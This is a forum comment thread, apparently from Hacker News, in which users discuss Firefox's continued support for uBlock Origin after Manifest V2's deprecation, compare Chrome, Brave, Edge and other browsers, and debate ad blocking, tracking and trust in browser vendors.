          The "get a bunch of people looking at something interesting and then show them ads" business model has under-pinned newspapers, television, and now websites like Facebook, Reddit and Instagram.

          The content was always kind of a side show, an excuse to serve you ads.

          An example of an actual content company would be something like a movie studio, where the product is the actual movie, or a publishing house, where the product is an actual book.

          Newspapers, television channels and YouTube, however, are making their money selling your attention to advertisers. So I think calling them "ad companies that serve content" is actually correct.

    • inigyou

      Most of those sites that would shut down without ads are providing negative value and would make the world better if they shut down.

      Sometimes I make an exception. Sometimes.

      • Tyr42

        Then don't visit? Or realize how bad they are with ads and bounce? They probably track bounce rate as ads load.

    • soulofmischief

      The situation has been manufactured by the advertising industry such that the individual's rational response, blocking ads for multiple reasons, hurts the web in the long run. At the end, it will be said, "it was the ad blockers' faults", not "there were too many ads + tracking systems and ads could contain malware"

  • HaloZero

    I turned off my adblocker on 404 Media since I wanted to support them, I loaded one new tab in an article and it maxed my CPU at 100% for so long that I paused and had to figure out what was spiking my computer.

    Immediately turned it off.

  • chr15m

    Yes, in the same way constant software malfunctions and errors are normal and tolerated.

    • cpeterso

      Open your browser’s dev tools while loading a website and there’s usually a continuous stream of HTTP and JS errors and warnings. That websites actually work surprises me sometimes, but that’s the pragmatic beauty of the web.

  • mrkeen

    I just live in the world where most things are crap.

    People put up pages because they want to express themselves and/or receive views or engagement.

    AI kills the first half, and trying to sell my attention kills the second half.

    I don't stick around for it. I click into "the secret romantic lives of elephants", hit popup hell, then realise I really didn't care. I often can't even remember what I clicked on as soon as I hit back.

  • iammrpayments

    Maybe it’s on purpose to keep people addicted to installing apps

  • loeg

    Chome with uBlock Lite looks, uh, pretty similar to Firefox with uBO.

  • seabrookmx

    > every page

    That's a bit hyperbolic. The areas of the internet I frequent do not have egregious ads (for example, this page). Areas where I really would like good ad-blocking (youtube) are often not covered by these ad blockers. Thankfully Youtube Premium isn't too expensive and solves that issue.

    Maybe it's better these days but I always found browser extensions (including uBlock) had a pretty big performance hit, so I've always shied away from them (with the exception of a password manager).

    • beej71

      > Thankfully Youtube Premium isn't too expensive and solves that issue.

      True, but some of us refuse to give that company money on principle. The minute I can't watch YouTube without ads is the minute I stop watching YouTube. (The creators I follow make way more money off me on Patreon than Google would ever pay them, anyway.)

      > I always found browser extensions (including uBlock) had a pretty big performance hit

      I always found that not using uBO was a pretty big performance hit. :)

    • abdullahkhalids

      uBlock causes a huge performance improvement for most regular people's computers.

    • username923409

      > Areas where I really would like good ad-blocking (youtube) are often not covered by these ad blockers.

      uBlock Origin works perfectly fine to block YouTube ads.

      > I always found browser extensions (including uBlock) had a pretty big performance hit

      In various places (e.g. the wiki [1]) you can find benchmarks showing that webpages load faster, rather than slower.

      [1]: https://github.com/gorhill/uBlock/wiki/Various-videos-showin...

    • prmoustache

      adblock works well with regular youtube ads (not the one inside the actual content).

mikeocool

Guess it was a bad idea for everyone to switch to a browser made by one of the world’s biggest advertising companies.

eahm

Wtf, simply not true:

Brave: chrome://flags/#brave-extensions-manifest-v2 > brave://settings/extensions/v2 > Enable uBlock Origin (Brave-hosted, even better).

Helium comes with uBlock Origin pre-installed.

Edge even still has it https://microsoftedge.microsoft.com/addons/detail/ublock-ori...

And I'm sure others ...I personally only use/test Brave, Brave Origin, Helium and Firefox.

  • culi

    Edge is dropping support. Helium is not a major browser.

    Brave is the only one that might be considered a valid point. However, because of Chromium dropping support they've had to implement a custom bypass to support Manifest v2 and they are also hosting a version of uBlock Origin for Chromium on their own servers.

    It's really questionable how long this state of affairs can go on for. Brave has said they will support it "as long as they are able" but Google could easily just remove the `webRequest` API from Chromium or the engineering burden to keep it alive might just get to be too much

    Unfortunately, I think it has an expiration date on any Chromium-based browser.

    • eahm

      Agree on the last part, let’s see for how long.. but for now it’s simply not true.

  • tech234a

    Edge will lose it within the next few months: https://blogs.windows.com/msedgedev/2026/08/07/moving-the-mi...

    • Scoundreller

      RIP corporate users that can't install their own browsers but can install extensions

    • CSMastermind

      Ahh so this will be what moves me off of Edge. Microsoft has almost entirely pushed me out of their ecosystem at this point.

  • LeoPanthera

    The title says "major browser", which none of those are.

  • grishka

    I use Vivaldi and I recently installed an update that disabled my v2 extensions. Had to downgrade and disable update checking.

    • orphea

      Latest Vivaldi on Linux (8.1.4087.66, Chromium 150). uBlock Origin works.

  • sebstefan

    Opera also claims they are committed to support manifest V2 forever.

bambax

There's a mystery here. People hate ads. Firefox is the only major browser (save Brave?) that properly blocks ads. Yet people don't use Firefox (indeed its popularity is in free-fall).

Why? Is it because they don't know about it? Or they won't go to the trouble of using any browser that isn't the one provided by default by the OS?

I'm not sure. I just don't get it.

  • WickyNilliams

    It's a damn shame. Using FF on android with a fully fledged uBlock Origin is so good. Makes the web usable. I don't know how people stand browsing with chrome.

    I recommend FF whenever the topic of ads comes up and hope that word of mouth with eventually do its thing. Most people don't know about it in my experience.

  • therealmarv

    I use Brave. I want Chromium under the hood.

    Firefox on mobile is not good, tried it many times. I also don't trust Firefox Mobile security as much as I trust Brave/Chromium on Android.

  • Shank

    Back when I first moved off of Firefox the answer was performance. A lot of users mass-migrated to Chrome because it supported a very similar set of extensions and was significantly more stable and performant. People like me evangelized switching to Chrome for everyone. Many copies of Chrome were installed by me.

    Now the performance still hasn’t caught up to Chrome but it has improved, and uBlock Origin Lite does a decent job at a baseline level of blocking for most people.

    • alt227

      I have used Firefox solely for over a decade. Recently I switched to Chrome to see what I was missing. I was horrified at Chromes memory bloat and the fact it puts tabs to sleep. Trying to click through old tabs was an absolute nightmare as it tried to quickly load back each tabs state and memory, and cpu spikes massively causing whole machine slowdowns, blank white pages, and app freezes.

      People say that Firefox doesnt display some pages properly, but I am yet to see one and nobody has ever managed to show me a page that works in Chrome but breaks in Firefox.

      Chrome is a glitchy mess compared to Firefox, and Firefox still has Manifest v2 and fully working uBlock. Its a no brainer for me, back to the orange fox I go.

      • humanfromearth9

        orange.be doesn't work on Firefox. The support will tell you to use Chrome or Edge.

        • alt227

          Really? What doesnt work? Im logged into it right now on Firefox and it seems fine to me.

    • Synaesthesia

      The performance and stability with lots of tabs is actually outstanding.

  • al_borland

    The pattern I've seen is that people move to a new browser due to speed and bloat. When IE was king, people started moving to Firefox, because it was fast and lean. Over time, it didn't feel so lean anymore, and then Google launched Chrome with TV ads showing how fast it was. Now everyone makes fun of the system resources Chrome requires, but people probably don't see a viable alternative to move to. Firefox is likely seen as old, Safari is only viable on Apple platforms, and everything else is a coat of paint on either Chrome or Firefox. Maybe Ladybird will take users from Chrome when it's ready for general use.

    • herrherrmann

      It’s hard for me to imagine that most people care about speed. I think it’s more likely that they just don’t know how bad Chrome is (for the internet) and how evil Google is (it’s still the main search engine for most people). I think Chrome is familiar, and Google is good at locking people in, pretending that Chrome does things better (or even making sure other browsers are handicapped on the Google sites, like YouTube being slower on Firefox).

      • al_borland

        With Firefox, when it grew, most of what I saw was friends installing it on their friend’s computer. It felt very organic and word of mouth. It may have also been an answer to the pop-up hell of the era, but I’m more hazy on that.

        > they just don’t know how bad Chrome is (for the internet)

        I agree on this. Every time I’ve brought this up on HN I get a lot of push back from people arguing that Chrome is pushing the web forward and the other browsers are holding it back. I think this is a very short-sighted view.

        • Fizz43

          Firefox needs word of mouth to grow. It needs tech people and firefox users to talk positively about it. But all they do is nitpick and spread baseless FUD its no wonder users drop.

          I always tell people firefox is amazing because it really is. It has cool features, it looks cool, its fast, the company behind it is awesome.

  • inigyou

    Firefox is also the only "major" browser not installed on any device by default. People with windows use edge, people with mac or ios use safari, people with android use chrome. People with linux use firefox but those are extremely few since none of the machines you buy at the store have linux.

    It's really that simple. Marketing realism wins over technical excellence every single time.

    Do you know why Valve invested so much into Linux? It's because Microsoft threatened to blacklist Steam from Windows unless they gave Microsoft a 30% cut of all sales. Why would Microsoft do that? Because they can, and it makes money on average (failed this time in particular though). Capitalism is a dog-eat-dog world.

    • alt227

      > Microsoft threatened to blacklist Steam from Windows

      That would never fly with consumers, Microsoft are big but not that big.

      • account42

        That's why they won't do it all at once. First they'll introduce a special kind of more limited application where Microsoft has to approve them before you are allowed to install them. Then they'll have some editions of Windows only allow those limited applications. Finally they'll keep expanding that until only $$$ enterprise customers can run applications that haven't been approved by Microsoft.

        These big tech companies are well acquainted with managing consumer backlash for unpopular changes.

      • inigyou

        What would said consumers do about it? Nothing, that's what. No matter how much you think they should do, they won't. Just like your phone isn't a Linux phone.

        • alt227

          I guarantee you if steam was blocked on windows, lots of gamers would do something about it. They are generally technically adept people, and if their multi-hundred pound library of games suddenly got taken away from them on windows, many would buy a steam deck or dual boot linux to get that back.

          • inigyou

            Yeah they'd probably run the same .exe files from their steam folders. And to buy new games, they'd go where games are sold. Which would be the Microsoft store. Which would be extremely beneficial for Microsoft.

            • alt227

              There would be no update mechanism meaning games would get out of date with no way to apply patches, and no steam api for multiplayer games meaning nothing would work online.

              You seem to not really know much about the subject so I will stop debating with you here.

    • TiredOfLife

      > Microsoft threatened to blacklist Steam from Windows

      Never happened.

    • shooly

      > Marketing realism wins over technical excellence every single time

      It is so annoying to see this idiotic mantra being repeated every single time a thread like this pops up. It's simply not true. There is no conspiracy, people aren't being manipulated by Big Tech to like Chromium-based browsers more. Those browsers are simply better and that's it. That's really all there is to it.

      • inigyou

        No, they're simply preinstalled and that's it.

        It's so annoying whenever you say chrome wins because it's preinstalled someone makes a stupid comment about how it's not a big tech conspiracy. Did I say it was a big tech conspiracy?

  • ekjhgkejhgk

    Most people hate ads, but they don't hate them as much as they hate having to learn how to do something for themselves. Therefore, the default almost always wins.

    It's a cynical view, but I'm confident that it has a great deal of truth.

  • neRok

    "That's the way she goes"

    > Or they won't go to the trouble

    Some people don't even ask why the thing on the ceiling is beeping.

  • Athari

    1. Firefox is behind on enough of web features that is hurts. Mozilla is explicitly against implementing some, which is even worse.

    2. Nobody tests on Firefox anymore, so random sites can break.

    There're some features unique to Firefox which I miss, but I like being on the be bleeding edge of tech.

    Firefox has been getting noticeably better recently, so maybe I'll get back to it. If Mozilla changes its stance on local fs access and stuff, it'll be a strong signal.

    • maleldil

      By "web features" you mean things Google decided they wanted and neglected to put through the actual process. This is why Firefox is important; the alternative is letting Google control the Web like Microsoft did.

  • pedrig

    to me it seems that "normal" (non-tech) people just dont bother even looking for better options. they dont know and dont care.

  • MichaelDickens

    > Or they won't go to the trouble of using any browser that isn't the one provided by default by the OS?

    Chrome isn't the default on Windows or Mac, but it's far more popular than Edge or Safari.

    • niutech

      It's because it's been heavily advertised in Google Search, social media and numerous installers as an optional feature (checked by default).

firefax

You can have my ad blocker when you take it from my cold dead fingers. I will literally move to a shack in the woods rather than go back to late 90s level of bullshit advertising.

  • zaik

    > move to a shack in the woods

    That's what gemini:// is for.

    • 2b3a51

      And Dillo is the equivalent of a shepherds hut in the back garden.

      • antics9

        It’s remarkable functional.

        I’ve gone weeks using no other browser than Dillo. Usually also disable CSS for most sites.

        Built in custom CSS for all sites is also a treat.

      • MathMonkeyMan

        It's cozy!

  • colega

    I wouldn't need an "ad-blocker" if we just went to 90s level of advertising.

    It's not really about advertising as much as it is about "bullshit" nowadays.

ivraatiems

For those who use uBlock Origin Lite, have you noticed any issues/deficiencies in what ads are blocked? I haven't.

  • jimrandomh

    I use Firefox with (non-lite) uBlock Origin, and occasionally fire up Chrome (with uBO Lite) for testing. The main issue that I run into is that uBO lite filters can't vary per-domain, so in order to rule out an ad-blocking-false-positive on something I'm developing, I have to turn it off for _all_ sites, not just localhost. (Actual false positives are rare, but needing to check is not so rare.)

    • tredre3

      That's not true, the on/off toggle is per-site in uBlock Origin Lite.

      • jimrandomh

        ...Huh. I just rechecked, and indeed it was. I may have been remembering a limitation that was present temporarily when the MV3 switchover happened.

  • socalgal2

    I have not really had any issues with ads using uBlock Origin Lite. It's like the complainers live in an alternate reality or just listened to some influencer and never actually checked.

    I do miss the rules that let me remove stuff based like CSS like selectors. The strange thing is, even though uBlock Origin Lite doesn't support that feature it's still totally possible to make an extension that does that. Maybe the specific thing uBlock Origin was doing is not possible but making an extension that follows rules and hides/deletes elements with different rules per site is still fully possible under manifest v3

    • armadyl

      But you can do this with uBOL? I’m not sure what you mean. I have multiple rules to hide elements on various sites. With HN I hide elements and can give it a custom CSS dark mode through uBOL. Works on both desktop and iOS.

  • Shank

    My experience using uBlock Origin Lite on iOS is that some particularly intrusive ads will figure out a way to load, like local news sites from the US, and many sites will be fully broken (missing entire content portions, content doesn’t scroll, entire page can’t be interacted with). These issues simply don’t occur on uBlock Origin but only exist as an artifact of aggressively blocking elements without applying fixes to unbreak sites.

  • Marsymars

    I’ve found uBlock Origin Lite (and every other non-uBlock Origin blocker) to struggle with websites using Ad-Shield. (i.e. the entire website breaks.)

  • Recursing

    Haven't noticed any issue, the main limitation is the lack of mobile support on Chrome, but that has always been the case.

    I'm so grateful for Firefox on Android

  • hn_submit

    In the short time I've used it I haven't noticed any appreciable difference.

  • XzetaU8
  • timbit42

    It seems to block most, if not all, ads but I wonder whether it blocks tracking as well as uBO.

  • fsflover
  • leros

    I honestly haven't really noticed a difference in ads after switching to the Lite version. It seems to work well enough.

imagetic

Support Firefox. F** Chrome.

  • imglorp

    Seriously.

    The web is completely unusable without UBO+FF. Any time I have to use a clean browser, I feel assaulted and dirty, plus wonder what malware just got injected into my machine.

    If it were to go away, I would probably accelerate retiring to an analog, offline life.

    • iLoveOncall

      I mean did you try with Chrome and Ublock Original Lite? Because I have and there's literally no difference at all.

      • culi

        It's different under the hood. The crux of the difference is the webRequest API which is only available in Manifest v2. This allows uBlock to strip all tracking data from the requests themselves. So while Chrome w uBlock Lite is hiding almost all the same ads from you, it's not protecting you from tracking

        The Lite version also relies solely on filter lists that require you to update the extension itself while the MV2 version can do so dynamically. Additionally, it lacks CNAME Uncloaking which I imagine will become much more commonplace soon enough which will make it impossible to block those ads

      • alt227

        There is a lot of difference. Try watching Youtube with uBlock Lite for example.

        • imglorp

          Yes. I see no ads on youtube. Period. None.

          I tried a blank Firefox on YouTube the other day for a 20 minute video and it was packed with pre-roll ads and then a mid-roll ad every several minutes. Unwatchable.

          • alt227

            > I tried a blank Firefox on YouTube

            Wouldnt this be the same experience on all 'blank' browsers? The whole point was install ublock origin extension and that all goes away.

            You make it sound like its Firefoxs fault that youtube is full of ads!

  • nullhole

    Fix?

  • allarm

    You either don't use the f-word at all, or just write the whole word, uncensored. It's not that hard: fuck Chrome.

  • imagetic

    +1 *

tech234a

Haven’t tried it but apparently there is an unofficial port of the full version of uBlock Origin to work on manifest v3, the largest challenge being that, on manifest v3, the webRequestBlocking permission is only available to enterprise sideloaded extensions: https://github.com/r58Playz/uBlock-mv3

  • culi

    Great but as soon as Google decides to completely strip the `webRequest` API from the codebase, it's game over. Now that it's deprecated it's only a matter of time. This also means Brave, the last Chromium-based browser to support it, will also be unable to support it

Heidaradar

I've been using Firefox for over 6 years now and I've never regretted it.

  • sixtyj

    20 years and counting. :)

    Thanks for every day that this browser works.

    Sometimes I had to test something in Chrome - and it’s painful experience.

    But it really depends on personal view - I have tried to convert my friends and they don’t feel it.

    • coldpie

      Sammme. Remember all the hullaballo about the AwesomeBar in Firefox 3?

      https://ed.agadak.net/2008/03/beyond-awesome

      Truly amazing stuff, in 2008.

    • sevenseacat

      Been using Firefox as my main browser since version 1.5.

      The last few years I've noticed that some things have stopped working as smoothly though - mainly just little CSS glitches and things because people don't test in Firefox :(

  • talon8635

    I’ve never felt so old as I did reading this comment

  • TiredOfLife

    I have been using Firefox for 20 years and the regrets kept accumulating till I switched to Chrome 3 years ago.

thrusong

I'm a web developer and I have a deep love of Firefox. I've been on it since version 3 and I'll be with it to the bitter end. I love that uBlock Origin is still available and while the news of Firefox's declining market share can be quite concerning, I hope it will be around for a long time.

system7rocks

And we must protect it at all costs.

I love Firefox.

We need more browsers like Firefox - more open source, more open to standards that improve the web, that can improve our browsing experience.

  • culi

    I agree. The death of Edge's Trident and Opera's Presto has been really scary for the web. I know it's really far off but I truly hope Ladybird, Servo, and Flow succeed in building mature and competitive web engines

  • inigyou

    Then make one.

hn_submit

Does it really make a huge difference to keep supporting Manifest Version 2?

I've installed uBlock Origin Lite in my Edge browser and I don't see any ads there either.

  • culi

    Yes, huge difference

    - MV2 version has sophisticated scripts to not only block ads but prevent tracking. With the lite version you might not be seeing most ads but you are certainly being tracked more

    - MV3 version might "hide" ads but the MV2 version is blocking requests from every being made. All those stats you hear about improved battery and reduced bandwidth usage with an adblocker are only true for the MV2 version

    - CNAME uncloaking is only done with MV2 version. That means when advertisers on sites cloak their CNAME, you won't be able to block them

    - filters lists on Lite can only be updated when you install an update. In MV2 version it updates the lists dynamically. Advertisers change their domains all the time

    • Topology1

      Wow, I thought I was pretty savvy about the differences between Manifest versions; however, I had no clue about the CNAME part. Any idea what specifically became unsupported in v3 that caused this?

      • culi

        The whole debate is centered around the webRequest API which is only available with Manifest v2. MV3 instead relies on the declarativeNetRequest API. The declarativeNetRequest API does not expose underlying CNAME aliases

        Without the webRequest API, it is unable to intercept raw web requests on the fly or query live DNS/CNAME records or dynamically reroute matching rules. The MV3 version is basically just a static list of rules that is only updated when you update the extension itself

    • hn_submit

      Like I've said in earlier posts: tracking cannot be solved through technological means. It has to be solved through legislation.

      The only thing you get is an arms race which Big Tech will always win because they have infinite budgets to keep the music playing.

  • downrightmike

    YES!!

Animats

Manifest 3 is why I finally shut down Sitetruth and Ad Limiter. Removing ads from Google Search is now possible only in Firefox.

DavidPiper

Remember when Firefox was the first browser to have "tabbed browsing"?

Obviously UBO isn't a first party feature - but if only Firefox could generate as much traction about ad blocking as they did with tabs.

  • phyzome

    I'm fairly sure Opera introduced it first.

    • Fnoord

      Yes, well, kind of. Opera had Multiple Document Interface (MDI) which was actually (back then) far more flexible than tabs. But yes, Opera was first with MDI, and also I suppose the first web browser for the smartphone.

    • superkuh

      Yes. Opera (original, not what is called Opera now) introduced tabs first. I believe in the 5.0 version with presto engine.

  • tomjen3

    Yeah, I remember.

    I also remember it automatically blocking popup ads. That was a huge deal.

  • paradox460

    No, because Opera and SimulBrowse had it years before Firefox even existed

dadass

Firefox is also the only browser that supports anything like userChrome.css for customizing tabs, toolbar, address bar, menus, spacing, etc.

armchairhacker

Ladybird planned to release alpha this year. Unfortunately extensions are unsupported, but maybe soon: https://github.com/LadybirdBrowser/ladybird/issues/976

geekamongus

I wrote this article about Firefox 0.9 back in 2004, when they first implemented pop-up blocking, and have been using it every day since.

https://www.digital-web.com/articles/firefox_09/

ChrisArchitect

Related:

Microsoft Edge is about to lock out older ad blockers, just like Chrome did

https://news.ycombinator.com/item?id=49220392

  • Insanity

    Edge is just chromium under the hood. So not a surprise there, should be easy lift for them.

josefritzishere

Ads are so invasive and prevalent now that you need an ad blocker just to use the internet.

vovavili

Thank God for the Brave browser. For those disliking their built-in adblocker, there is a Manifest v2 opt-out specifically for uBlock if you need it.

  • AstralSerenity

    Peter Theil was an angel investor in Brave. That alone is all the reason privacy-minded users need to avoid it.

    • al_borland

      Wasn't Brave also founded on the back of a bunch of Web3 nonsense? That's always what kept me away. I'm actually surprised how many fans it has.

      There was something else they did that was shocking a couple years ago that made me glad I never used it. I went to wikipedia to jog my memory and found this...

      > In 2020, the company was found to be appending affiliate referral codes to the end of certain cryptocurrency exchange URLs typed into the browser's address bar. The practice applied to exchanges such as Binance and Coinbase, and was later discovered to extend to suggested search queries for terms like "bitcoin" and "ethereum".

      I'm not sure why anyone would trust a browser that does this kind of thing. Some could claim it's a harmless way to make some extra cash, but it's very similar to what Honey was caught doing.

      • niutech

        Come on, it was 6 years ago, they have apologized since then. Firefox also had slip-ups like pop-up ads in 2023: https://news.ycombinator.com/item?id=36073619 and ToS backlash: https://news.ycombinator.com/item?id=43251762. Give Brave another try!

        • AstralSerenity

          Everyone properly informed on the topic now understands the Mozilla ToS debacle was a complete nothing burger and simply a result of California law, miscommunication, and Mozilla being careful. Not one thing changed in actuality.

          Brave is a Thiel-funded, VC-owned private company with far more egregious monetization efforts.

          Ultimately I know everything at Mozilla is completely controlled by the mission-driven non-profit parent -- something they've recently double-downed on.

          Brave does not have those same assurances and cannot be trusted.

        • al_borland

          At this point, I won’t use any Chromium based browser. I don’t want Google having full control of the future of the web. I don’t trust an advertising company with that power.

    • TiredOfLife

      As someone who lives in a country bordering russia, I will certainly switch to Brave now.

    • fragmede

      Because Peter Thiel gave them some money, there's some secret backdoor code that's sending all your information to Palantir?

      • rwz

        It's quite likely that Brave itself collects data on your usage and shares at least some of it with Palantir.

        This isn't such an outrageous assumption to make here.

        • EbNar

          There's no need to make assumptions. The source code is out there. Please, show us the relevant commits which do what you said.

        • shooly
          • rwz

            I mean sure, but there's a bit of a difference between "sells data to no one really knows who" and "sells data to no one really knows who AND PALANTIR" which the original commenter seem to be flagging as a problem.

            • inigyou

              "no one really knows who" is probably also Palantir or someone who resells to Palantir.

              • AstralSerenity

                From what I know personally, Firefox truly is responsible with user data. Though -- to steel man your point -- all the data Firefox sells is through their subsidiary Anonym, which goes through great lengths to anonymize all user data that can't be tied to any individual.

                Example: selling market preferences of a town rather than the individual people in it.

            • shooly

              Well Thiel investing in Brave once at the beginning doesn't necessarily mean that Palantir is getting any data now (even though it's presented as if it was a fact in other comments here). It's probable, but really it's just speculation, just like anyone can speculate about who's getting data from Firefox.

              But at least with Brave, the initial funding information was made public, so there's already more information available to users in comparison with Mozilla. Mozilla just said: "there are a number of places where we collect and share some data with our partners" - that could mean literally anyone.

        • tredre3

          Telemetry can be disabled in Brave. Any kind of history/bookmark syncing is opt-in.

          You're just spreading FUD unless you have evidence that Brave funnels usage data in secret.

      • AstralSerenity

        Sometimes you make decisions based on principle and future risk. Brave Software is a for-profit company that funded its start through Peter Thiel.

        Even if fine in the present, you cannot guarantee me the future of a Thiel-funded, VC-owned firm.

        Mozilla, in comparison, is a mature, non-profit with substantial goodwill and operational transparency.

        Everything past these details are just noise.

        • niutech

          Mozilla has also a for-profit corporation.

          • AstralSerenity

            No, Mozilla is a non-profit -- you may just misunderstand charitable structure optimization. It has a for-profit public-benefit subsidiary called Mozilla Corporation (Firefox).

            This is common in non-profits for a number of reasons: protects the foundations assets, allows for engaging in commercial operations (Mozilla VPN, Anonym), greater flexibility, etc.

            It is not a true for-profit company. All "profit" flows up to the non-profit and the non-profit parent retains complete, absolute control while being tied to the Mozilla mission.

      • downrightmike

        That is their MO

  • culi

    It's on a time limit. Chromium deprecated MV2 but still keeps the webRequest API in the codebase. Google could at any time decide to strip it entirely. Or it could just stop working due to lack of maintenance as Chromium grows.

    Brave is relying on a fork that takes advantage of the fact that the webRequest API is still technically there

    • drewfax

      That's why Brave probably built an in-built adblocker written in Rust. Works great on both desktop and mobile.

      • culi

        Brave's adblocker looks pretty good but it's not nearly as customizable or granular as uBlock Origin is. I don't use Brave but I think it'd be nice to be able to choose from a variety of adblockers instead of being forced to rely on the "official" one because of the MV2 stuff

  • matheusmoreira

    It's certainly better than stock Chrome but Firefox becoming relevant again is still the ideal option.

  • jollyllama

    It's good but I find they EOL devices/OS's earlier than Firefox.

  • ipsum2

    Brave is great. Works across windows/mac/ios/android/linux.

  • odidiejdiwjd

    Isn’t Brave just another Chromium variant?

    Chromium is detestable. In whatever form it takes.

  • iLoveOncall

    Brave is malware, I don't understand how anyone on HN can use it, baffles me every time.

    They've literally been caught MITMing web pages for their own financial gains.

    • TiredOfLife

      In that case Firefox is also out. They have been caught auto installing random hidden extensions with full read/write access to all websites and blocking uBlock Origin from working on, for example, the Firefox extension site.

      • iLoveOncall

        > have been caught auto installing random hidden extensions with full read/write access to all websites

        Lol, they chose to ship parts of their browser as extensions, it's definitely now "random extensions".

        > and blocking uBlock Origin from working on, for example, the Firefox extension site

        Any other example? Bypassing an extension on their own website has absolutely no link to the browser itself being a malware, this is ridiculous.

        I don't even use Firefox and I think Mozilla is a shit organization misusing its funds to pursue bad ventures lately, but even I think your claims are bullshit.

  • WickyNilliams

    Why use Brave rather than FF? Sincere question. Lots of tech minded people choose it, when FF seems like an ideal choice?

    My reasoning for not using Brave: not only is it a wrapper around Chromium, but their crypto stuff and some dodgy affiliate injection in the past paints them as untrustworthy.

    • niutech

      Come on, this was 6 years ago, they have apologized since. Firefox also had trips like pop-up ads in 2023: https://news.ycombinator.com/item?id=36073619 and ToS rewriting: https://news.ycombinator.com/item?id=43251762.

      Brave is faster, suspends tabs when getting short of RAM with hundreds of tabs, has a first-class built-in ad blocker and fingerprinting protection, is compatible with Chrome extensions, includes Tor support, provides anonymous Brave Search with Goggles out of the box, free and private AI assistant Leo.

      • WickyNilliams

        I was just explaining my reasoning. Trust is gained in drops and lost in buckets. Affiliate fraud is far more serious and untrustworthy than a popup advertising their own product. But yes Mozilla have had their missteps too, no doubt.

        In any case, thanks for explaining. There are some features there I was unaware of

darepublic

I feel that the web via browser is in danger. Vast majority of people can be convinced to switch to walled garden apps just like vast majority are fine with tablets, phones aka non open locked down computers. I am a Firefox/ublock user, and prefer browser to mobile apps, however I see the writing on the wall

  • sva_

    The Web might be better off if those offenders aren't part of the web anymore.

Gud

I was shaking my head when my fellow developers, and some hackers, moved from Firefox to mostly Chrome. “It has better dev tools you see”, “it’s so much faster you see”, and a boatload of other excuses.

But what about the remonopolization of the web? I remember how much it SUCKED when internet explorer had 95% of the web thanks to Microsoft’s illegal practices. I saw the same behaviour from Google, the ad company and they haven’t event gotten a slap on the wrist. Fuck, people fucking loves Google, despite their turn to the dark side.

Well here we are, with the open web almost dead. It’s time to revive it. Start using alternatives again. Seek out and support people and organisations that are actively working to build the community web, not this corporate shit it’s morphed into.

End rant

  • SoftTalker

    Yep. Chrome is the new IE. Zero difference. And Chrome was created to break the grip that IE had.

sammularczyk

I just started using Zen (Firefox-based Arc clone) after Arc updated to Manifest V3. It's great! Last time I installed zen it was a battery hog, but it's much better now.

  • niutech

    No, Zen is still a memory hog. See numerous threads on Reddit and issues on Github about excessive RAM usage.

user2722

No-one referenced Firefox also has Brave's adblocking implementation baked in, even if disabled for now.

Additionally, I eagerly await resource (CPU+site size) buckets to be implemented on a browser and a LocalCDN along it to shrink the web.

saghm

> But Firefox is one of the few web browsers remaining that isn’t based on Chromium, and it’s now the only major browser to still support uBlock Origin. Neither Safari nor DuckDuckGo—the two other major non-Chromium browsers out there—support uBlock Origin

Does anyone here use DuckDuckGo browser? I've honestly never heard of anyone using it, so I'm pretty surprised to see it categorized as a "major browser". I already basically think of Firefox users (which includes myself) as a pretty tiny minority, so I'm not sure how much smaller you can really get while still being "major".

  • davidfischer

    I use DDG on Android and it works pretty well there. I also saw this line in the article and it's somewhat of a stretch to call DDG either a "major" browser (as you point out) or a "non-Chromium browser". My understanding is it uses the browser engine bundled with the OS on Android/iOS/Mac/Windows and it isn't available for Linux.

    The wikipedia article on it says:

    > The core browser functionality is the WebView component provided by the operating system. This means the browser engine is Blink on Android and Windows, and WebKit on iOS and macOS.

    • saghm

      Interesting, thanks for the context! I hadn't realized it was mobile-only, which is probably part of why I hadn't realized it existed. And yeah, it does seem like they maybe didn't know what they were talking about if the engine is literally Blink.

self_awareness

Lots of browsers have built-in adblockers that use the same lists as uBlock Origin. Why it's important to support the extension? We have adblocking anyway.

But also, be Mozilla: decimate your own plugin ecosystem, kill half of plugins, force to rewrite the other 50%. But a few years later support this 1 extension, and people will remember that you're a good guy.

When they've adoped Chrome plugins, they've effectively gave up their shares of relevance to Chrome and now they're paying for it.

  • defrost

    It's not the uBlock Origin extension that needs saving for "better" adblocking, it's the capabilities of the now discontinued by Google / Chrome extension supporting framework known as Manifest V2.

    The 'newer' Manifest V3 replaced the V2 webRequest API with a more limited declarativeNetRequest API.

    The original allowed the intercept and blocking of network requests in real-time as generated, the replacement allows a limited subset of filter blocking after requests have been sent and returned.

    ie: V2 allowed for less network traffic and greater amount of filtering, V3 provides slower page completes and limited filtering.

    • self_awareness

      Manifest V2 functionality that has been cut out was used only in adblockers, right?

      And we have adblockers built-in in various browsers now.

      So since we have built-in adblockers, we don't really need MV2 functionality anymore? Why oppose MV3?

      I mean why people want to oppose MV3 instead of simply asking your favorite browser to expose the browser-specific API for missing functionality, like it was done "in the old days"?

      If Google wants to block MV3, then let it block it, and ask browsers to expose missing API. Of course this won't happen in Chrome, but back in my days when software was limited, we simply stopped using it in favor of more complete software.

      • defrost

        I'd suggest you sleep on that comment and come back with fresh eyes and a clear head; as is, the logic isn't as joined up as you might think.

        • self_awareness

          I'm afraid I've already spent many nights sleeping on that exact same view.

          If you're more enlightened, then the best you can do is to explain it to lesser beings, not virtue signal that you know better but others are unworthy of your knowledge.

          • nickthegreek

            mv2 can stop tracking in ways mv3 cannot.

            • self_awareness

              I understand that. But multiple browsers have cloned uBlock-like ad blocking as their core functionality. For example Vivaldi, Brave. And they don't need MV2 to block ads, and use uBlock filters (easylist, abp filters, etc). So they block ads even if they don't support MV2 anymore.

              • nickthegreek

                If you understand that, then why are you saying we don’t need MV2. MV2 does more. It’s better.

                • self_awareness

                  We need MV2. But we can't get it. Google is stronger. So instead of fighting for MV2, I say we fight for another set of browser-specific APIs in browsers other than Google's.

stack_framer

I just use Brave. I haven't seen a YouTube ad in years.

  • cykros

    There are ads on YouTube?

    • Imustaskforhelp

      Oh yes they are. Occassionally when I am on a device which doesn't have an ad-blocker. I witness it and I am always left feeling shocked at how many ads Youtube can have. We really don't know the plight of so so many Youtube users. I feel sympathy for them and want to hug them and install an ad-blocker for them.

      I actually used to install Revanced for all the relatives who ever complained about Youtube and some who didn't even ask! I just feel like Ad blocker is such a useful thing that I can do to people that I care about who don't know deeply about it.

      I must say that it is one of the top entries of lists of most useful/time-saving things I have done in actually saving anybody's actual time.

      I express gratitude towards the universe for Ublock Origin. Words can't comprehend how much I love it.

      • nottorp

